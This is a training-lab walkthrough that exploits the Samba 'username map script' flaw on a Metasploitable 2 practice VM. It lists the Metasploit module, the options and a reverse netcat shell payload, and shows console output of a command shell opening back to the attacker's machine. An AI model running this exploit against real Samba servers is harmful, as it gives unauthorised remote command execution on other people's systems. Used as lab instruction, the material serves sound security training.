SAMBA (Samba “username map script” Command Execution)
SAMBA (Samba “username map script” Command Execution)
Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.
Requirements
Metaploitable 2
The Metasploitable 2 VM
Metasploitable Framework
Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP
The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.
Laboratory Workflow
The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.
1. Launch the Metasploit Framework
msfconsole
2. Use the module
use exploit/multi/samba/usermap_script
3. Check the module options
options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.8.147 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic4. Set the appropriate options
set RHOSTS 192.168.8.142
RHOSTS => 192.168.8.1425. Run the exploit
run
[*] Started reverse TCP handler on 192.168.8.147:4444
[*] Command shell session 1 opened (192.168.8.147:4444 -> 192.168.8.142:50116) at 2023-03-28 18:47:28 -0400Video
Video that resumes everything on this laboratory.
Questions
Now that you have completed this exploitation try to answer to following:
Now, what can I do with the exploitation achieved?
Which type of privileges do I have on the exploited target?
How was this accomplished?
Try to learn more about this vulnerability.
Last updated